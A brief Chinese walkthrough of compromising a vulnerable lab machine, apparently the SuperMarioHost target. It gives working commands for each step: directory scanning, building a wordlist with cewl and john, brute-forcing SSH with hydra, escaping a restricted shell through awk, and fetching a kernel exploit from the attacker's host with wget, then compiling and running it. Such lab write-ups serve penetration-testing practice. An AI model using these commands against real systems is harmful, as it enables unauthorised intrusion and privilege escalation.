信息收集
主机存活检测
对照virtual box的mac地址得到主机IP为198
namp详细扫描敏感目录扫描
dirb http://10.9.47.198:8180/ /usr/share/dirb/wordlists/big.txt
发现vhosts目录,访问一下发现信息:
靶机服务器名称(mario.supermariohost.local)
服务器的管理员(webmaster@localhost)
网站根路径(/var/www/supermariohost)
目录索引(mario.php)
由于80端口无法访问,配置dns
访问域名gobuster扫描域名访问 http://mario.supermariohost.local:8180/luigi.php 发现用户名
页面爬取密码作为密码字典
cewl http://mario.supermariohost.local:8180/luigi.php > pass.txt
john在该user的基础上生成相应社工密码进行爆破
john --wordlist=pass.txt --stdout --rules > passwords
九头蛇密码爆破
hydra -l luigi -P passwords ssh://10.9.47.198 -V
爆破出结果
ssh登陆
进入之后发现大多数命令无法使用,使用help命令查看可以使用哪些命令
发现可以执行awk cat cd clear echo exit help history ll lpath ls lsudo vim 命令,所以想到awk提权
awk提权命令
awk 'BEGIN{system("/bin/bash")}'
发现权限提升
查看内核版本
kali查询版本漏洞 下载漏洞
开启apache2 联网,此靶机不支持 python
service apache2 start
靶机下载kali的提权漏洞
wget http://10.9.47.225/37292.c
编译执行
提权成功